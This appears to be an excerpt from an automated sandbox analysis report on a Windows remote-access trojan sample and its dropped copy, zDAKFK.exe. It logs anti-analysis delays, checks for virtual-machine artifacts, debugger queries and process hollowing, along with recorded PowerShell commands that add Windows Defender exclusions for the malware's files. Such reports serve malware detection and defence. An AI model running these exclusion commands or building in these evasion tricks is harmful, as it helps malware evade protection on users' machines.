                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 1780000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 32C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 31F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 9470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 7CA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: A470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: B470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: BA30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: CA30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: DA30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 980000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 24E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 2280000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 80F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 6B80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 90F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: A0F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: A710000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: B710000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: C710000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: D90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 2880000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 4880000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 599250
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 599140
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 599031
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598922
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598812
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598703
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598594
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598484
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598375
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598265
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598156
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598047
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597937
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597828
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597718
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597609
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597500
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597387
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597281
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597172
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597062
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596952
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596843
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596734
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596625
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596515
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596406
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596297
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596187
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596078
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595969
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595859
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595750
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595640
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595531
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595422
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595312
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595203
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595094
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594984
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594875
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594765
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594656
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594547
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594437
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594328
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594219
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594109
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5752
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 515
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6394
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Window / User API: threadDelayed 1397
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Window / User API: threadDelayed 8468
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe TID: 7044 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3244 | Thread sleep count: 5752 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260 | Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2148 | Thread sleep count: 515 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5332 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256 | Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6860 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7284 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep count: 32 > 30
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -29514790517935264s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7904 | Thread sleep count: 1397 > 30
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -599250s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7904 | Thread sleep count: 8468 > 30
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -599140s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -599031s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -598922s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -598812s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -598703s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -598594s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -598484s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -598375s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -598265s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -598156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -598047s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -597937s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -597828s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -597718s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -597609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -597500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -597387s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -597281s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -597172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -597062s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -596952s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -596843s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -596734s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -596625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -596515s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -596406s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -596297s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -596187s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -596078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -595969s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -595859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -595750s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -595640s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -595531s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -595422s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -595312s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -595203s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -595094s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -594984s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -594875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -594765s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -594656s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -594547s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -594437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -594328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -594219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -594109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900 | Thread sleep time: -594000s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 599250
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 599140
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 599031
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 598922
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 598812
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 598703
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 598594
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 598484
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 598375
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 598265
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 598156
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 598047
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 597937
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 597828
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 597718
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 597609
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 597500
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 597387
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 597281
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 597172
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 597062
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596952
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596843
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596734
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596625
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596515
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596406
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596297
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596187
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 596078
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595969
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595859
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595750
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595640
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595531
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595422
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595312
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595203
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 595094
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594984
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594875
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594765
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594656
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594547
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594437
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594328
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594219
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594109
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Thread delayed: delay time: 594000
                Source: Amcache.hve.19.dr | Binary or memory string: VMware
                Source: Amcache.hve.19.dr | Binary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.19.dr | Binary or memory string: vmci.syshbin
                Source: Amcache.hve.19.dr | Binary or memory string: VMware, Inc.
                Source: Amcache.hve.19.dr | Binary or memory string: VMware20,1hbin@
                Source: Amcache.hve.19.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.19.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.19.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.19.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.19.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.19.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.19.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: zDAKFK.exe, 00000010.00000002.4131158474.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.19.dr | Binary or memory string: vmci.sys
                Source: Amcache.hve.19.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.19.dr | Binary or memory string: vmci.syshbin`
                Source: Amcache.hve.19.dr | Binary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.19.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.19.dr | Binary or memory string: VMware20,1
                Source: Amcache.hve.19.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.19.dr | Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.19.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.19.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.19.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.19.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.19.dr | Binary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.19.dr | Binary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.19.dr | Binary or memory string: VMware Virtual RAM
                Source: Amcache.hve.19.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.19.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Code function: 16_2_00D9EC85 LdrInitializeThunk,16_2_00D9EC85
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Memory written: C:\Users\user\AppData\Roaming\zDAKFK.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
